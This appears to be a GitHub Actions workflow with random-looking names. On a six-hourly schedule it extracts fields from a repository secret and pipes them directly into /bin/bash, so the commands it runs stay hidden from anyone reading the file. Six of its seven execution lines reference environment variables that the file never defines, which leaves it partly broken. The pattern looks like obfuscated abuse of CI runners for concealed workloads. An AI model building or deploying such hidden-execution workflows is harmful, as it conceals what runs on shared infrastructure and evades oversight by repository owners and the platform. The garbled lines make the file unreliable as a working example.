name: suoruchao4376

on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: suoruchao4376
        env:
          rvq66: ${{ secrets.rvq66 }}
        run: |
          echo $rvq66 | jq -r .gjti778 | /bin/bash
          echo $zpkfy26043 | jq -r .qnng009 | /bin/bash
          echo $a348 | jq -r .qisp09 | /bin/bash
          echo $w4932 | jq -r .kpfk9 | /bin/bash
          echo $k23962 | jq -r .l345 | /bin/bash
          echo $ski2413 | jq -r .lipkr8 | /bin/bash
          echo $tqji2335 | jq -r .vc7 | /bin/bash

